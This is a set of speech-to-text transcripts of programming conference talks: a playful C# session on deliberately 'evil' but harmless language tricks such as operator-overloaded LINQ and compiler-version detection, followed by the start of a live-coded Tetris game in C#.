don't want to bother writing a loop and a catch block and whatever. Just if something goes bang, just put us back to where we were before. But it's more of the same, so relatively boring. Let's look at some, now sort of old school, back in C sharp 3. I love Link, do you all like Link? Yeah? What do you like about it? Pardon? It's good. I'm looking for a little bit more detail. All of those people that ask questions on Stack Overflow are saying, my code doesn't work. I'm sure you don't really. Yeah? Composition. Yes, that's good. Pardon? Expressiveness. Yeah, the problem with Link is it's so wordy. You have to write so much code. We really want to make something a lot more concise. Let's have a quick basic demo of, I don't want to write all these words. I would rather like operators because I'm a Pearl fan. Instead of writing concatenation and where and selecting things, I really want to use sort of and as my where clause and pipe as my select clause. Because then I save whole characters. It's really important. Let's look at what we think this link to operators code should do. We've got hello world, how are you? And then we're going to subtract world. So the idea is I've taken every operator that you can overload in C sharp and overloaded it on this, I can't remember whether it's called evil innumerable or something like that, operator innumerable. So every single operator does something and we'll have a look at what some of them do in a bit. So we're going to take away world, leaving hello, how are you? And then we're going to add in today. So that leaves hello, how are you today? And then we're going to filter it. And is generally for kind of filtering-ish operations. So this is our where clause. So we're only going to keep words of length 5 and then we're going to uppercase them. Oh, and then we're going to write out this query three times. So if you've got a sequence, I'm not sure, but I think Python, even if it doesn't have multiplication for sequences, I think it does for strings. If you do hello times 3, it will return hello, hello, hello. Is that right? Any Python people? Yeah? Okay. So I'm only giving this as an example of what not to do, but some languages do something like this. So I reckon this should show hello world today, hello world today, hello world today, all in uppercase. Yeah? And it does. Oh, sorry, without the world because we subtracted world. So that's the basic example. And all of this is actually reasonably simple. As soon as you've, I'm not kidding on this case. So if we look at the evil extension method, all that does is create an operator innumerable because you can't overload operators on interfaces. Sad. The evil we could come up with if we could overload operators on interfaces. Wow, we could have a lot of fun then. But no, we've got to create this operator innumerable, which just remembers the source and it remembers it as innumerable of object because hey, we might as well. It makes various other things interesting. And then we've just got the operators. So we have seen and which just returns where? I'm not going to re-implement all of linked to objects. That would be crazy. That would be an entirely different talk. But we've got where? We've got select. The unusual thing here is normally operator operands aren't delegates. I can't remember ever seeing something where you use a lambda expression as an operand. So that's in some ways all that's different here. Just as random examples of what we've got. So here we have arithmetic minus plus star and slash. Any ideas what's going to happen when we use plus plus source and minus minus source? What would it make sense to do? Let's see. So we start off with arithmetic minus plus star slash. When you add a plus to it, it adds a plus. Just adds a little plus sign. When you take away minus, you know, minus minus, we take away the minus sign. It's kind of simple. Any other operators that you can think of that might have fun things? The sequence is just concatenation. We've seen normal concatenation. So you only overload the plus operator. So that's relatively straightforward. Division was that. Excellent. That's what I was about to show. So we can use division in multiple ways. What would you expect to happen if we divide a sequence by something? Group by. Yes. So that's one option. So here we have a bunch of employees and we're going to divide by a delegate returning the department. So let's run it and then I'll see if I can move the. Okay. So division by a function. Let's just concentrate on that bit first. So we can see this is exactly doing group by. So accounting has Dave. Sales has Bill and Betty. Finance has Holly and Edward. And engineering has Diane and Tom. So that's division by a function for group by. We could also divide by an integer, which is just, you know, let's batch up this sequence into groups of, in this case, five. So if we start off with to be or not to be, and we just split it by spaces, we get ignore the fact that we've got extra commas because of the commas in the text. And if we're going to make division by an integer, divide things into batches, then we'd like that to give you know, whole batches, which means your remainder operation can then do whatever's left at the end. So division returns a sequence of sequences. And then the remainder just shows whatever's left, whatever doesn't fit into the final batch. How about the bitwise, yeah, bitwise negation, the twiddle operator. What does it look like? A wave. It's kind of a bit here and there and everywhere. So I thought it would be quite fun to do a shuffle. So when we run this, twiddle items, who knows, it might come out in any kind of order. Yes. Now, most of these operators that I've used don't change the thing that they're called on, which is a good thing. However, I would like to show you the hideousness of the unary operators. So this little segment owes itself to Eric Lippert, who used to be on the C-sharp compiler team and is now working for covariate. And I think it was in the annotated C-sharp spec. He said, the unary plus operator is the most useless thing that you could possibly have. It's only there so that you can put plus 10 as well as minus 10 for symmetry. I'm not entirely sure whether this code proves him right or proves him wrong. However, if we're going to have, we've got the unary plus operator and we've got the unary minus operator. Now, when I was first coming up with this code, I asked various people on Twitter what they would want to do with the unary minus operator. So that's the operator that is not x minus y, but just minus y. I've closed this so that you can come up with some ideas of your own. Any suggestions? Backwards? Okay, reversing? Yes, that's one option. Shifting? I've got shifting as the shift operators because those feel kind of sensible. Put it this way. I think shifting with the shift operators makes a lot more sense than writing to a stream or reading from a stream. What kind of crazy language would do that? So, yeah, not shifting, but someone suggested element-wise negation if they're integers. We can just negate them. And someone else suggested something truly hideous which is it should pop. It should return one element and remove it from the thing that it's operating on. Never, ever, ever, ever do this. So, just generally, operators shouldn't change the thing that they operate, their operands. So, we've got three different ideas there, reversal, negation, and popping. Now, the unary minus operator doesn't take any operands other than the thing it's working on. So, if we've got three different potential operations, we need some way of switching between them. So, this is what the unary plus operator does. Imagine that we have, we've got an enum of reverse negate pop, reverse negate pop, and we can just cycle between them. And I think it starts off by default it reverses. And if you use the plus operand, that returns a new one. It's not crazy enough to mutate the existing one. It returns a new one that has the next kind of behavior for the unary minus operand. So, if we start with, these are just the first few digits of pi. When we print them out, we'll see 3, 1, 4, 1, 5, 9, 2. A single minus will just reverse. But if we use plus sequence and then use minus on the result, who would have thought this would even be valid? Yeah? Then, it will negate each thing. Unfortunately, we can't do plus plus sequence in order to advance it by 2, because that would use the plus plus operator. Out of interest, let's see, does this work? The operand of an increment must be a variable property or indexer. No, I don't think it's liking that. So, we could potentially make the plus plus operator. Let's just change what the plus plus operator does to make it return plus plus sequence. And then, we might be able to get triple plus to work, which would be awesome. Okay, so that's a reasonably simple, oh, it's still not liking it. So, we can do that. And now, we can just do plus plus sequence and it'll do the same thing. Yeah? So, I think you can do these in as many batches of 2 as you want. Oh, no, no, it doesn't like using plus plus on something else. So, we'll have to make do with these two. But we can probably get rid of one bracket there. There we go. Right. So, when we've done plus plus sequence, it will now go into popping mode. And each time we call minus popping, it will return one element and remove it from the current thing. So, when we print out popping, so we'll have popped. I can't remember which end it pops from. But we'll have either removed 314 and it'll print 1592 or we've removed 295 and it'll print 3141. And then, if we reverse the, if we take the original sequence and go through one addition to get to negation, one addition to get to popping, and then one addition, it should go back to reversal. So, when we then do the unary minus operator of that, it should just print out the reverse so 2951413, et cetera. Let's see. Unary operators, 314. Okay. So, pop takes it from the start. And it all works. Of course, we could change the minus, minus operator to do minus, minus, which in the case of popping would be bizarre in all kinds of ways, actually. In the case of reversal would do nothing because it would reverse it twice. And in the case of negation, it would also do nothing or go bang when you tried to print it depending on whether you were actually printing numbers or not. Sorry. The last reverse didn't work. Let's check that. I'm sure you're right. But the unary operators. Oh, you're right. What's going on there? Yeah, but when we take plus, plus sequence, the plus operator does take a copy. Or it should, at least. Yeah. Let's take, so something is badly wrong here. So, this is now no longer using our crufty right. Yep. No idea what's going on there. Might have a look later on. What does this do? There's no reason why that shouldn't work that I'm aware of. Okay. Bizarre. So I think we've probably proved that Eric Lippert was right. And this isn't a strictly speaking good idea. Right. Any other? Oh, yeah. You can multiply two sequences together. And you get cross multiplication. So this will do a1, a2, a3, b1, b2, b3, c1, c2, c3, I think. Yep. I've already mentioned the shift operators for rotation. So you could make the shift operators or at least you could make right shift get rid of things in the same way that right shifting an integer loses information. But no, I just rotate the whole thing. Inverse. Oh, yeah. So not of a sequence. This is quite fun. So what does not of a sequence mean? I've defined it to be sort of an inverse of the possible sequence. So it's not something that on its own is useful. But when you add another sequence to it, it removes all of those things. It's sort of like dark matter. It will obliterate anything else. So when we've got, when we add the range 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 to the inverse of the first seven digits of pi, it will only produce those digits which aren't in the first seven digits of pi. If I remember rightly. There we go. 0, 6, 7, 8. Okay. I think that's probably enough linked operators. How am I doing for time? Fine. So that was the not operator. Not on a sequence. I've got two ones. Yes, it's treated as a setwise inverse. Basically, because I didn't want to rewrite everything and I just wanted to use except, the normal except link operator. Are there any other operators you would like to see? I can't think of any I've missed off at the moment. Oh, there's true and false. So you can do if sequence and other sequence. Sorry? Is there a, oh, is there an exclusive OR operator? I'm sure there is. Let's see what it does. Exclusive OR. Oh, is except. So it returns elements that are only in one of the two sequences. So, you know, exactly as you'd expect. Think of it as bitwise and just I'm doing it with sequences. So let's show that. So, foo bar bars.evil.exor2. So I reckon this should print foo bars quucks. After the stuff that came before. Yeah, foo bars quucks. I've shown pipe and and just looking at the top of the keyboard. Yeah, that looks like it's all the operators available. Always worth playing around. Okay, so quiz time. Next thing is version detection. So this is where I tried to stump the C sharp team and it was quite fun. C sharp has had how many versions? Pardon? It's had six versions. 1.0, 1.2, 2.0, 3.0, 4.0 and 5.0. And the C sharp team is very keen on backward compatibility. So ideally, any program that previously compiled, if you compile it with a new version of the C sharp compiler, it should do the same thing, right? So I took this as a challenge to break C sharp and try to come up with a program that would compile on not necessarily all versions of C sharp, but in order to compare any two versions, it should compile on both the old and the new and give different results. So I've hidden them here so that we can see if anyone can work out any differences. My guess is that you won't get the first one. How can we detect the difference between C sharp 1.0 and 1.2? And I have no idea why it wasn't 1.1. Any ideas? Okay. I have it on some authority that in C sharp 1.0, when you use a for each loop, okay, let's rewind a little bit, when you use a for each loop, it calls get enumerator. Yes, happy with that. And whatever is returned by get enumerator, so the I enumerator usually the non-generic I enumerator that was present in dot net 1.0 didn't implement I disposable. I believe ish that in C sharp 1.0, that enumerator was never disposed. Whereas in C sharp 1.2, conditional code was added saying if the enumerator happens to implement disposable, then dispose of it at the end of the for each loop, just like it does for I enumerable of T, where I enumerator of T implements I disposable. Really important so that finally blocks in iterator blocks execute, okay? So in order to detect the difference, we create our own funky class which implements both I enumerable and I enumerator because we don't care. We're just going to say it doesn't have any values and it's its own enumerator. All it's going to do is remember whether or not it was disposed. We're going to for each over an instance of it and return whether or not it was disposed. Now I've been somewhat cautious about this saying, you know, I think this is the case. I looked at the specification. It's relatively hard to even find the C sharp 1.0 specification and the diff isn't terribly helpful. But I believe the 1.0 spec does say that it should dispose. And I have this idea in my head that it doesn't. It's quite hard. It's hard enough to get hold of the spec. It's really hard to actually get hold of the C sharp 1.0 compiler because it won't install on any modern operating systems. I need to find someone with XP and see if I can install it on that. So what do you normally do if you believe something to be true and you want to check it and you can't prove it directly? I can wait here all day. Pardon? You can ask on Stack Overflow. In general, you can search the web, right? And I did find a number of references stating that this is the case. Unfortunately, they were all me. So I'm not going to claim that this is definitive. I really, really want to see this in action sometime. I must have got the idea from somewhere. That's kind of all that's giving me hope at this point. Okay. So that's 1.2 to 1.0. What about C sharp 2 and C sharp 1.2? So we can't use generics or anything like that because we know that that just wouldn't have compiled in C sharp 1.2. So can anyone think of any differences in C sharp 2 that you'd be able to detect? Pardon? Events? What about events? Sorry, shout out loud. Yeah, events themselves existed before. You're along the right lines. It's around delegates or at least the thing I'm thinking of is around delegates. That man is right. Give that man a prize if we have one. So the gentleman said it's covariance and contravariance of delegates. So when you create a delegate back in C sharp 1, remember we've got to do the new event handler stuff. We can't just do button.click plus equals do stuff. It's got to be button.click plus equals new event handler do stuff. And in C sharp 1, the signatures had to match absolutely correctly. So if you had a mouse move handler, in order to create a mouse move handler, you had to have a method that took mouse move event tags. In C sharp 2, you can have something that takes just event tags on the grounds that anything calling it as a mouse move handler and passing in a mouse move event tags, or mouse event tags, whatever it is, that's going to be fine and valid. So, okay, we know that one conversion isn't valid in one case and is valid in another. How can we use that to prove which version we've got? We can't use is because we've got to have something that compiles first. Pardon? We can't cast, so we've got to have some code that does new some kind of delegate type and pass in a method. How can we differentiate? I'll show you. It's the same trick that we're actually going to use in various different cases. If we have a base class with just the general version, so the event tags version, and a subclass, oh, sorry, in fact, no. Why don't I make this something more familiar? Mouse event tags, mouse move event tags. Oh, someone tell me what the, sorry, add a reference to WinForms. There we go. And that one takes event tags. So, here we have a general one and we're going to do new, where is that event? No, I was fine before. Okay. Ignore me. Right. So, imagine the mouse move event tags and event tags but taken up a higher level. If you've got a method that can take any object at all for the second parameter, it can definitely take an event tags. So, if we try to use just normal event handler, so the signature of event handler is object sender event tags, args. If we try to create this from derived, so we're creating an instance of derived and the compile time type is also variant derived, so we've got this. And we say create me an event handler using the foo method. In C sharp 1, the compiler would first look at this foo method and say, no, I can't use that. That second parameter is wrong. Tell you what, I'll look at the base class instead. And then it finds something, so it ends up using the right, it ends up using this base implementation. The C sharp 2 compiler says, no, that's fine. I can use this more derived method. These are two separate methods. This isn't overriding. This is overloading. I can use this, the second method because object tags is compatible. This signature is compatible with the signature of the delegate. So, all we need to do is see which one is called. And basically, we assume it's false. And if the derived version is called, then we call it with true. Okay. How about C sharp 3? The way that generics behave, can you give more details? In respect to contra variants and covariants, no, that was C sharp 4. So, the.NET runtime has had support for generic covariance and contra variants back since.NET 2, but C sharp as a language only allowed out and in C sharp 4. But, you're close. It is around generics. Anything else happen in generics in C sharp 3? Pardon? Type inference. Yes. Give that man a teddy bear. So, in C sharp 2, type inference was pretty dumb. Haskell and F sharp people will say it's still pretty dumb in C sharp 3 onwards, but it was really pretty dumb in C sharp 2. So, you had a bunch of parameters and a bunch of type parameters. Are we all clear on the difference between a type parameter and a normal parameter? Yeah. So, if you had a generic method with one type parameter, T, and two actual parameters, both of which were of type T, then type inference would try to work out T from each of the arguments that you passed and then say, are those all correct? Do they all match? Exactly. In C sharp 3, it takes a much more sort of heuristic view of things, holistic rather. And it says, well, I'll look at all the arguments you've given me and work out what kind of constraints I've got and then try to find something that matches all of those. So, I'm going to try to find all of those, but they don't have to, we're not trying to work out the whole of everything about T from each argument individually. So, that exact example that I gave, we've got a foo of T that takes T for both parameters. And as our sort of backstop, let me just undo this. If I comment this out, we're going to try to create, we're going to try to call foo with an object and a string. So, in C sharp 2, it would say, hey, I know what T is, it must be object for the first argument. And then the second argument would say, I know what T is, it must be string. And then the two of them would look at each other and say, you're wrong, I know best, compile time error. So, if we would try to compile this code now on a C sharp 2 compiler, it would blow up. Now, I've said we don't want it to blow up, we want it to compile and then do something different. So, let's add an overload to keep these two arguing arguments happy, didn't think of that before. To stop them from arguing, we'll say, you can do T1, you can do T2, they can be completely separate, it's all right, you don't have to share. So, the first argument says, right, T1 must be object. And this one says, two must be string. And they look at each other and say, that's fine. But in C sharp 3, it will still prefer this version because overload resolution first looks at the most derived class and says, right, can I find anything in there that will match? And it says, yes, T can be object because string is an object, so that's fine, so I'll use that overload. So, again, all we need to do is return true or false. Happy? Okay, you've done pretty well so far, I have to say. C sharp 3 to C sharp 4, I haven't got it in this file, I've got a slightly separate file. Any ideas? Scoping of, hold that idea for later on, but this is C sharp 3 to C sharp 4. You're absolutely right, I'll come back to you for C sharp 4 to C sharp 5. Anyone, what are the differences in C sharp 3 and C sharp 4? What were the features of C sharp 4? Named parameters, yes, or named arguments, and their partner in crime, optional parameters, yes. How long have optional parameters been around in.NET? Since the beginning, yes. So, if we have a separate assembly, so we compile this with, this has to be compiled with the C sharp 4 or up compiler, but it can still target.NET 2, so we're still going to be fine to use the C sharp 3 compiler to compile something that refers to this assembly, and look, it's the overloading and base class trick again. So, all we're going to do is call detect defaulting without any arguments, and that will be entirely valid to do whether we're using C sharp 3 or C sharp 4. It's just it'll use a different overload. So, this is worth, I said you wouldn't get anything useful out of this, it's just possible that this could actually come up in reality if you've got, say, a visual basic assembly that you are referring to. It can happen, and it's got this sort of structure, then if you're compiling with C sharp 3 and C sharp 4, you could get radically different results. And again, we just return false if we haven't got defaulting and true if we have. Okay, so that's C sharp 3, C sharp 4. Finally, C sharp 4 to C sharp 5. You had a great idea, sir. Yeah, they've changed the scoping of variables. They've changed the scoping of variables in which particular loop? In four each. In four each, yes. So, the way that the iteration variable of a four each loop is captured by an anonymous function, whether that's a lambda expression or an anonymous method, has changed in C sharp 5. Entirely silently, and this is worth knowing if you're an open source developer, if you've got some developers using Visual Studio 2010 and some using 2012, then someone could check in code that works fine against their compiler and will fail silently with the 2010 compiler because it will still be valid code, just something that does the wrong thing. So, here we have, in C sharp 4, there was one variable, so our bool value would be as if it were declared outside the loop, and then it would then take on each value within the sequence as we went along. And when you captured that variable, it captured the single variable, even if you captured it several times. So, when you look at the end, if you use that variable that's captured after the loop has finished, you will always see the final value. In C sharp 5, it's different and much saner, we get a separate value variable for each iteration of the loop, so we're capturing that, and then we're just going to see at the end what happens if we find out what the variable, the variable that we captured on the first iteration of the loop, what's its value now? And in C sharp 4, we've only captured one variable, so it would have a value of false. In C sharp 5, we'd have captured only the variable associated with true, so it would still have a value of true. Right. All happy with version detection? I should point out these are corner cases, and in the case of at least the variance of delegates, the compiler would normally warn you saying, hey, this behavior has changed between C sharp 2 and C sharp 1. I think for type inference, it might do as well, I'm not sure, I think I've disabled all the warnings to avoid giving hints. Okay, finally, and this is actually in some ways my favorite because it's the most elegant, oh no, we've got loads of stuff to do, and not much time. Okay, let's give you a crazy thing to start with. Right, what's that code going to do? We haven't got much time, come on, what's this code going to do? Sorry? It will print out 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, sorry, not 10, 0 to 9, yes. I don't want it to go up to 10, I only want the first five numbers. So we'll just do limit equals 5, is that okay? Well, yes, it is okay. But this output is a bit boring, it may be a little bit harder to read from the back. So let's put the current value of x is, is that going to be clearer? Let's see. Yeah, that's clearer now, it says 0, 1, 2, 3, 4. So you can see that this is a perfectly simple project. What's going on? Implicit operators, well, but where are these operators coming from? Far is a class, ah, it's a class that's sneakily hidden within assembly info.cs. And yes, there is an implicit operator to var from both string and number, string and int. And when we, when there's also an implicit operator to two int, so when we printed out console.writeLine, console.writeLine, let me see whether hovering shows what's going on. Yes, it does. Right. So if I hover over this, probably shows two small c, but it's showing that it's using console.writeLine int. Even though the type of x isn't int, there is an overload, sorry, there's an, an implicit conversion to int, and the overload that takes an int is more specific than the overload that takes object, which is the only other one available for this. On the other hand, when we use this form, because we're using, you know, standard formatting, this is now going to call to string. It doesn't know that there is an int conversion. That was very impressively quick, I have to say. Okay. Something slightly similar. I have two bits of code that look very similar. So we've got some mystery class, and we're going to call getValue on it. And it's, you know, dynamic. We, we don't know exactly where this count method is going to come from, but we're using system.link, so, you know, maybe that'll work. Demo two doesn't have system.link, so the count method better be a method, right? Doesn't really matter exactly what the output is, other than the fact that I'm running the wrong project. When I do demo one, it prints three. When I run demo two, it prints ten. Any ideas what can be going on such that just adding using system.link makes a difference here? Lots of answers, but shout out because I can't actually hear details of any of them. Dynamic is a class as well. Where? Importantly, it's in the system.link namespace. It gets a bit funkier than that, though. So mystery is declared to, is statically declared to return a system.link.dynamic. Okay, so even though we don't have, in demo one, demo two rather, even though we don't have a using directive for system.link, it's declared to return a system.link.dynamic, but we're just using dynamic, the real dynamic. So when we call x.count, it's really trying to find the count method, which it finds, finds from here. So we have one class called the system.link.dynamic, and it's called the real dynamic. So when we call it, it finds from here. So we have one class called dynamic, and then a subclass called static. So actually, in this case, the static type of the return of get value is dynamic, but the dynamic type, the runtime type, is static, just for a bit of fun. So count returns 10, and it finds that using dynamic typing. In demo one, we know about system.link, so dynamic here refers to the class. But we've also got an extension method, the normal innumerable extension method. So this is now calling the standard extension method, because dynamic also implements a number of int, and we're yielding three things. So even though we're not calling the statically typed thing is calling an extension method, and the dynamically typed thing is calling the actual, you know, really known count method, partly because dynamic typing can't call extension methods, and partly because it knows that the type is actually static. So that's a little bit of funkiness, and I have four minutes to show wrapping async. It's a shame. I'll probably keep you all a bit longer. Feel free to leave when you need to though. Right, so let me give an example. Async is a sort of, I think it might be called a co-monad, but async has something in common with normal link, and indeed with nullable of t. They're all about wrapping and unwrapping. So nullable of t, I can write nullable int x equals 10, and the compiler will wrap the int into a nullable int. Yeah, and I can use an explicit conversion to unwrap it back to an int. In link, we deal with one value at a time, you know, our select clause or where clause or whatever thinks of one value at a time, and things are unwrapped and wrapped to deal with sequences. In async, not always to do with task, but in general, we'll think of task, you write code that deal with non tasks by using a wait on a task to do unwrapping, and then if you return a normal value, you return an int, and your method is declared to return a task of int. The compiler does some wrapping for you. That's all good until you've got multiple things. So I've got a service that will give me multiple details about a person. It will get me their weight, their name, and their age, their birth date. Each of those is going to be a task. Okay? Imagine I don't have a class that describes all of these things. I can do this, but now I've got, I've got to have these three variables and then separately create that, and it's a bit of a pain. I like this anonymous type because it wraps these related fields together. Imagine we had a tuple instead of those tasks, and we would like somewhere of unwrapping from a tuple of task t1, task t2, task t3 to a task of tuple t1, t2, t3. So it's sort of switching around the tupleness and the taskness. Do you see what I'm saying? We can do that easily. We can write our own little transpose method that basically says take these three tasks, when they've all finished, return a tuple with all the results. And this uses task completion source. We could actually, we could write this using async and just return a task of tuple t1, t2, t3 by awaiting all three. So that's nice-ish. We can then start doing it implicitly by having an extension method on tuple task t1, task t2, task t3 called get-awaiter. So we have, we have transposers that, the slow way of doing, or you know, the explicit way of doing things. And then if we call get-awaiter, we will just call transpose and then call the get-awaiter that's returned by the task. Async is pattern-based for the await part. Therefore, the compiler sees that, okay, tuple of task t1, t2, t3 doesn't have a real get-awaiter method, but it has this extension method, so I'll call that instead. Next, and I'm sorry, I'm rushing this a little bit. If we have an anonymous type, and the nice thing about anonymous types and what I don't like about tuples is we get to see what these things mean. Wait, name, and birthday have meanings. Item one, item two, item three don't, right? So tuple is, is kind of great for coupling things together.
|
We've all seen bad code. Code worthy of the Daily WTF. Code which makes us wonder how products ever ship, let alone work. Bad code is boring. Evil code is entirely different. It's bending a language in ways that would make the designers weep. It's code which you stare at and swear that it can't possibly work... until you see how it does.
|
10.5446/51452 (DOI)
|
Hello everybody, we're going to get started. Welcome. I'm a quick introduction and we'll just get straight to the code. For those of you wondering what the heck is TechPub full throttle, I'm Rob Connery, I work at TechPub, that's what I do, make videos. Everyone knows who he is, John Skeet. We have a series of TechPub where basically we have a small single problem when we get a developer that knows what they're doing and we say, do it and they start coding and I start recording what they're doing. Then I throw curveballs at him and make him do all kinds of silly stuff. The one person that's been missing in our full throttle cannon, if you will, is John. The reason is I have no idea what John's doing. It's impossible to throw curveballs at him. I thought today that maybe I'd make him code in Esperanto or something. Or I don't know, Erlang? JavaScript, Ruby, Python. Pretty much you name it, Python, C-sharp and Java and I have no idea. Right. It's actually an interesting problem coming up with, what are we going to have John code? The first idea was wouldn't it be fun to have him re-implement SignalR and laugh at Damien Edwards and David Fowler as he does it in 100 lines of code. But guess what Damien and David are doing tomorrow? They're actually going to code live on stage and re-implement SignalR. So we can't do that. Anyway, I was talking to John and we came up with the idea of a thing he started doodling on one night, which is Tetris. At first I was like, that's stupid. But he started explaining it to me and I was like, that would be fascinating. So, to give you a little bit of ground rules here, I'm going to lay down the thing to him. He's going to start coding and I'm going to basically comment on what he does, but I'm going to give him about 10 minutes before I don't know what he's doing. So with that, what we're going to do is Tetris, make a little Tetris game in Visual Studio, in C-sharp of course. Five? Yeah, of course. I've been working on my Skeet impression. Well, let's go. You like that? Scottish, yes. What the f*** was that? I can't swear, so there's no Scottish. Anyway, so are you ready, sir? Yeah, well, except that you were saying about, you know, you get someone who knows what they're doing. I have no idea, I have very little idea of what I'm doing on this one. Oh, yeah, okay. We'll see how we get. Yeah, okay. How about it? So just to give a little bit of background on this, when Rob said I was doodling on this one night, about five or six years ago, when I was working for a very different company, I'd finished one project, and it was the company party that night, and then maybe I was going on holiday, really didn't want to start on something new. And it was like, it was four o'clock, I was going home at five, there was no point in me doing a new bit of work. So I said to my team leader, is it okay if I just have a go at writing Tetris? He said, yeah, go on then. And I just about got it done in the hour as a console app. And it was probably horribly architected, because it was just doodling then. And I thought it might be fun to try to write, ideally, if time slows down, and I can just code like crazy, to have one model, view model, whatever, that we can then put a console app on, and a WPF app on by the end of the hour. Yeah, well that's the goal. We're not going to go there. Well, we could try, because the goal is that I'm going to try and talk while you code full speed. And that's going to be the fun part. And you can see I'm using test-driven development in that I've created a project called Tests, which will now remain empty for the rest of time. I'll teach you that. At least test folder driven. So we'll start with the model. I haven't written any of this code myself yet. I was talking to another speaker in the speaker room. Stuart, are you around? Yeah. Excellent. And we were sort of just noodling on this a little bit and trying to work out what would be involved and whether there was a model and a view model that are easily distinguishable in a normal MVVM, WPF, silver-lighty kind of way. And so at this point that I say, I'm really not an app kind of guy. I don't do GUIs. I'm a class library person. So give me an API to design and I can do it. So I'm going to start off on the raw model side, because that's where I feel I have some strength. And we'll see where that goes. How much view model do we really need? Can we put a view actually straight on the model and it still be portable enough? I thought we might have a go at doing this kind of functionally-ish. So let's keep things immutable where possible. Does that seem reasonable? The state of the game feels like something, at any one point, something's going to happen, whether that's time passes and a piece drops a bit, or the user says to move it left or right or do whatever. And it feels like that's a really quite straightforward, straight state transition. I think that sounds totally good unless things go pear-shaped. Wait a second. Okay. I need a drink. Okay, so what is the state of the game? We will have, in all of this, I'm going to write automatically implemented properties simply because it's simpler than writing read-only fields backed by a read-only property. So when I write something like game state, get private set, imagine I'm writing game state, get return. Pseudo code is really hard in Visual Studio because it just wants to complain at you all the time. Game state with a private read-only game state. Okay, it's a real pain that C-Sharp doesn't provide a nice way of doing this backed by a read-only field, but I just haven't got the time right now. I think it is C-Sharp, not Java though. I think the thing, yeah. Yeah, C-Sharp is still better than Java. I publicly acknowledged this morning, Java is better than C-Sharp in one way, which is enums. It has decent enums. However, we have logically a game state of active dead paused. So we would like to be able to pause the game. And while the game is paused, time can happen and nothing will happen. I think probably if user activity happens, we could decide that that is broken on the part of whatever's interacting with the API, but we'll see. But definitely it shouldn't do anything. The only thing that should unpause you is the unpause action. We could put interfaces around all of this. We won't right now. So a game will have a width, no, a game will have a board. And a board will have a width of height. So it seems like you're thinking about this from the visual angle. How would you play Tetris and you're seeing it, and you're starting from the outside in? Games have sort of, the underlying model is fundamentally visual, I would say. But it doesn't say anything about how we're going to display this. We could display it by hand somewhere with marbles or whatever. But we will have a board and I'm going to have a... What I really like is an immutable array at this point. But what I'll do is keep a... Let's hang on, another enum for each square on the board, not including the piece that's dropping. So that feels like it's, if you imagine layers, you've got the layer that already exists and then the piece that's dropping down. And I think it would be a mistake to include this piece as part of the current state. It will make it really hard to move it around because it's almost certainly going to, when we do collision detection, it would almost certainly collide with itself when you try to move it down. So that's not good. So we'll have the sort of background layer, the board, set in stone board layer, and we'll have another enum, which will be, I'll call it tile state. Okay, and we'll have none. And different, these happen to be colors, but they're arbitrary user differentiable bits of tile state. And it's either there's an empty space, in fact, let's call this empty. And how many different shapes are there? Seven, yeah? Yellow, orange, white, and cyan, whatever. Arguably, these are just seven different things. They can be mapped onto icons. They can be mapped onto colors. We might want to explicitly state that they are not inherently colored. They are just different templates. And so a board has underlying it, I think it has an array of tiles. But I'm not going to give access, unlike the game state where I've allowed you to access the state directly. We want to be immutable. Arrays are fundamentally mutable. There's nothing we can do about that. So instead, let's just put an indexer onto this, onto the board itself. Oops, okay. Return tiles x, y. Okay, I will rely on the array itself doing argument validation. So we'll get an array index out of bounds exception for a really polished API. I might make it to an argument out of range exception instead. Arguably, if you're using an indexer, I think array index out of bounds exception is arguably the wrong level of abstraction within.NET itself. If it had just been an index out of bounds exception, it would be entirely reasonable for the indexer to throw it. So it's a shame that the.NET framework guys didn't think of that just because it's an array. Why is an array a special case? So at some point we'll need to initialize that. We should definitely have the width and height. Okay, and this is complaining. Oh, yeah. So this needs to be public. So let's think about what we want to be able to do on our game. We want to be able to start a new one. And I've become quite a fan of factory methods, static factory methods, rather than constructors or rather invoking constructors under the hood. But it's quite nice to have named methods. Speaking of games, did I mention that this has to be a singleton because there's only one game at a time? No, why would there possibly be only one game? It's my fourth rattle, man. We're doing it immutable. If we have an immutable singleton, this is going to be a really boring game. You can't do anything on it. All right. Sorry, John. On the other hand, I can do this and then we can go down the pub. No to self. Don't mess with Skeet. I take it back. So we can start a new game and I think all we really need for a new game is a width and a height. Okay, I'll fill in stuff later on. It won't build for a while. What else do we want to be able to do to the game? Pause. Thank you. Public game. Pause. And so I think for that we can return a new game. So this is where the fact that I'm cheating with read-only properties, sort of pseudo read-only properties, actually makes this rather simple but not necessarily thread safe. So a little bit of detail. There's guaranteed to be a memory write barrier at the end of a constructor. By guaranteed, I mean one of the BCL teams blog posts or CLR teams blog posts somewhere details this. The memory model in.NET is not very well documented. There's the ECMO CLI specification which is relatively weak and then there's what we know that Microsoft's actually implemented and which I trust that Mono implements as well. And I know that there's a write barrier at the end of a constructor. So if you share a reference after a constructor has finished, then any thread should see the same data. That is not true with the way I'm writing things now. If you say so. Yeah. At this point, my brain's left the building. Have fun. Right. So the problem with how I'm writing this now is if I've got two threads observing this, it's possible, even though I return after, so I return from pause and then share that reference with another thread, it's possible that even though the new thread gets to see the reference, things haven't quite flushed to main memory or there's some caching involved somewhere and we still see some default state. So to summarize this from my small intellect, you're thinking about threading right out of the box. You're thinking about colliding things, correct? I'm thinking that we generally think that immutable things are thread safe. Yeah? Sorry? No. Immutable things not being thread safe. Tell them more. You're in trouble. No, no, no. I'm going to sit back and think what you take it before we are. So in what way, so firstly there's define what thread safe means, the typical Eric Lippert kind of response. But usually it's okay if you're in Kevlin Henney's talk, it's okay to have shared states as long as no one can modify it because everyone will see the same thing and we can't get into a state where you're trying to modify it at the same time as I'm trying to modify it. So the normal mantra is that immutable objects are thread safe. I'm going to say they're sort of not in a sec, but why are you saying they're not? Whoever it was, I can't actually see. I think he ran out of here. He's gone. Okay. So what I'm going to say here is this is publicly immutable, but you can tell that we're privately mutating this and the one time that you are really allowed to privately mutate is before the constructor has finished and making sure that you don't let the current reference out of the object until later on, until the constructor has finished. You showed me this once. Did I? Yes. Okay. Well, I'm cheating slightly and I've lost any time that it's made up by explaining all of this. Hopefully it was useful. Okay. So let's start. Let's code this one as well. So this is going to start a new game and a board is going to be board.startnew. So I'm deliberately using start as a game thing, whereas create. So a board doesn't inherently know whether it's alive or dead. So start doesn't feel quite right, whereas create new does. On the other hand, in this particular case, I could get away with the constructor. We're going to make this, wow, generate constructor stub. That's more like it. But I'm going to make this internal. So the idea is that I'm going to trust that nothing within model is broken. So I trust myself to call constructors. I'm not going to trust anyone else at the moment. We might decide 